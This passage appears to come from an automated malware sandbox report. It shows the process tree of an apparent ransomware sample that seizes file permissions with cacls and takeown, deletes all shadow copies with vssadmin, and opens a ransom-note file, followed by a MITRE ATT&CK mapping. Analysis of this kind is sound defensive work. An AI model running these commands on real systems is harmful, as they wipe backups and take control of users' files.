  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""
  2⤵
  PID:4176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "edbres00001.jrs" -nobanner
    3⤵
    PID:4828
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "edbres00001.jrs" -nobanner
      4⤵
      PID:4156
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SmsInterceptStore.jfm" -nobanner
    3⤵
    PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SmsInterceptStore.jfm" -nobanner
      4⤵
      PID:4276
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
    3⤵
    PID:2236
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
      4⤵
      PID:4460
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""
  2⤵
  PID:4820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "edb.chk" -nobanner
    3⤵
    PID:4976
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "edb.chk" -nobanner
      4⤵
      PID:4972
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:4784
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:5104
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    - Modifies file permissions
    PID:5060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:5052
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:5076
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:5112
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:2188
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:4156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    - Modifies file permissions
    PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:4996
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:4808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:644
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:4832
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4876
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:4220
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"
    3⤵
    - Modifies file permissions
    PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "vedatamodel.jfm" -nobanner
    3⤵
    PID:188
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "vedatamodel.jfm" -nobanner
      4⤵
      PID:4900
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:5104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:252
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:4468
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:4244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:4272
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:4288
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:4952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:4708
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:1732
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:2292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4548
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4832
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""
  2⤵
  PID:4808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "edbres00002.jrs" -nobanner
    3⤵
    PID:4876
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "edbres00002.jrs" -nobanner
      4⤵
      PID:4972
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4740

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\G5WPN79P.bat"
1⤵
PID:4844
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4360

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\Desktop\#MMTA_README#.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery